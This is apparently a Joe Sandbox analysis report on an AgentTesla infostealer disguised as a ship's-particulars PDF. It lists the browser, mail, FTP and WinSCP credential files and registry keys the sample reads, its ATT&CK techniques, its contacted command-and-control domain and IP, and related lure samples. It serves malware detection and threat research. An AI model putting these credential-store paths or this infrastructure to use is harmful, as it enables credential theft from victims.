                  Source: Yara matchFile source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 796, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		11
                  Masquerading                  		2
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  Credentials in Registry                  		111
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares2
                  Data from Local System                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS141
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  MV BBG MUARA Ship's Particulars.pdf.scr.exe47%ReversingLabsWin32.Spyware.Negasteal
                  MV BBG MUARA Ship's Particulars.pdf.scr.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.sakkal.comhs0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  beirutrest.com
                  		50.87.144.157
                  		truefalse
                    		high
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bTheMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/ianiDataSet2.xsdMMV BBG MUARA Ship's Particulars.pdf.scr.exefalse
                                        		high
                                        http://www.tiro.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.goodfont.co.krMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.ipify.org/tMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.carterandcone.comlMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/ianiDataSet.xsdMV BBG MUARA Ship's Particulars.pdf.scr.exefalse
                                                    		high
                                                    http://www.sajatypeworks.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.typography.netDMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/cabarga.htmlNMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cTheMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.galapagosdesign.com/staff/dennis.htmMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.ipify.orgMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/ianiDataSet1.xsdMV BBG MUARA Ship's Particulars.pdf.scr.exefalse
                                                                  		high
                                                                  http://www.founder.com.cn/cnMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/frere-user.htmlMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.jiyu-kobo.co.jp/MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/DPleaseMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers8MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.krMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleaseMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cnMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1820131384.00000000025BA000.00000004.00000800.00020000.00000000.sdmp, MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1823002760.00000000066B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.sakkal.comhsMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1822825090.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://beirutrest.comMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.microsMV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4192547572.000000000641A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.26.12.205
                                                                                            		api.ipify.orgUnited States
                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                            50.87.144.157
                                                                                            		beirutrest.comUnited States
                                                                                            		46606UNIFIEDLAYER-AS-1USfalse

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1560137
                                                                                            Start date and time:2024-11-21 13:05:09 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 26s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:9
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:MV BBG MUARA Ship's Particulars.pdf.scr.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/4@2/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 91
                                                                                            • Number of non-executed functions: 13
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • VT rate limit hit for: MV BBG MUARA Ship's Particulars.pdf.scr.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            07:06:13API Interceptor10528336x Sleep call for process: MV BBG MUARA Ship's Particulars.pdf.scr.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                            • api.ipify.org/
                                                                                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                            • api.ipify.org/
                                                                                            perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                            • api.ipify.org/
                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                            • api.ipify.org/
                                                                                            50.87.144.157CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                  01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                        TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                            EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                beirutrest.comCHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 50.87.144.157
                                                                                                                PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                • 50.87.144.157
                                                                                                                api.ipify.orgCHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                • 104.26.12.205
                                                                                                                DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 172.67.74.152
                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.13.205
                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.13.205
                                                                                                                https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                • 104.26.12.205
                                                                                                                https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                                                                                • 104.26.12.205
                                                                                                                https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                                                • 104.26.12.205
                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                • 172.67.74.152
                                                                                                                order and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                CLOUDFLARENETUSCONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 188.114.97.3
                                                                                                                https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.3
                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 188.114.96.3
                                                                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 188.114.97.3
                                                                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 188.114.97.3
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 188.114.96.3
                                                                                                                Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                • 104.17.25.14
                                                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 1.1.1.1
                                                                                                                CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                • 172.64.41.3
                                                                                                                UNIFIEDLAYER-AS-1USCHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 50.87.144.157
                                                                                                                Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 69.49.245.172
                                                                                                                https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 192.185.3.195
                                                                                                                https://1.midlifemouse.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVFXRTNlSFU9JnVpZD1VU0VSMTIxMTIwMjRVNTUxMTEyMjQ=N0123Nexample@email.comGet hashmaliciousUnknownBrowse
                                                                                                                • 67.20.112.200
                                                                                                                https://lmmoye.org/file/oL/xzw/Get hashmaliciousUnknownBrowse
                                                                                                                • 69.49.234.173
                                                                                                                USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 216.172.172.178
                                                                                                                Delivery_Notification_000275578.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                • 162.241.225.96
                                                                                                                USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 216.172.172.178
                                                                                                                New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 108.179.253.197
                                                                                                                arm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 162.144.165.86

                                                                                                                JA3 Fingerprints

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ePO#83298373729383838392387373873PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                • 104.26.12.205
                                                                                                                CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 104.26.12.205
                                                                                                                https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                                                                • 104.26.12.205
                                                                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.26.12.205
                                                                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 104.26.12.205
                                                                                                                CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 104.26.12.205
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 104.26.12.205
                                                                                                                Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                • 104.26.12.205
